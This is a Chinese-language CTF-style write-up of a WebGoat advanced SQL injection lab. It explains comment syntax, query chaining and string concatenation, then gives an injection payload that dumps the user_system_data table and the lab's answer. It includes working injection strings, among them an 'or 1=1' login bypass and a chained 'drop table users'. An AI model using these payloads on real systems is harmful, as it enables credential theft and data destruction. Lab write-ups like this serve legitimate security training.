# [ Webgoat - 3 ] SQL Injection (advanced) - 3 ## 題目 :  **Try It! Pulling data from other tables** Lets try to exploit a join to another table. One of the tables in the WebGoat database is: ``` CREATE TABLE user_system_data (userid int not null primary key, user_name varchar(12), password varchar(10), cookie varchar(30)); ``` **6.a) Execute a query to union or join these tables.** **6.b) When you have figured it out…​. What is Dave’s password?**  --- ## 解題 : ### SQL 語法 : ``` /* */ are inline comments -- , # are line comments Example: Select * from users where name = 'admin' --and pass = 'pass' ``` /* */ SQL 中表示 多行註解 -- , # SQL 中表示單行註解 <font color="BLUE"> 範例中 - - and pass = "pass" , --之後的程式碼將不會被執行 </font> ``` ; allows query chaining Example: Select * from users; drop table users; ``` ; 可將sql指令銜接 <font color="BLUE">範例中 會先執行 Select * from users 接著執行 drop table users</font> ``` ',+,|| allows string concatenation Char() strings without quotes Example: Select * from users where name = '+char(27) or 1=1 ``` <font color="BLUE">範例主要是教你如何在sql將String連接</font> **這題只有一段創建table的程式碼，並非在資料輸入時的程式碼** **所以在不知道資料輸入時的程式碼的時候，單行註解很重要，因為它能把 - - 後的程式碼給忽略** **範例:** *strSQL = "SELECT * FROM users WHERE name =' -name- ' AND password = ' -password-'"* 正常登入 : Select * from users where name = 'admin' and password = 'pass' SQL注入 : admin'and 1 or 1 -- ----> Select * from users where name = 'admin'and 1 or 1 -- ('AND password = '....) ----> 登入成功 ### 解答 : 3. (1) 第一題:  推測查詢Account的程式碼為: ==Select user_name from user_system_data = '$name';== <font color="RED">注入:</font> `';Select * from user_system_data-- ` <font color="RED">注入後程式碼: </font> ==Select user_name from user_system_data = '';Select * from user_system_data- -;== <font color="RED">!注入成功</font>  (2) 123456  ###### tags: `webgoat` `SQL Injection` `CTF`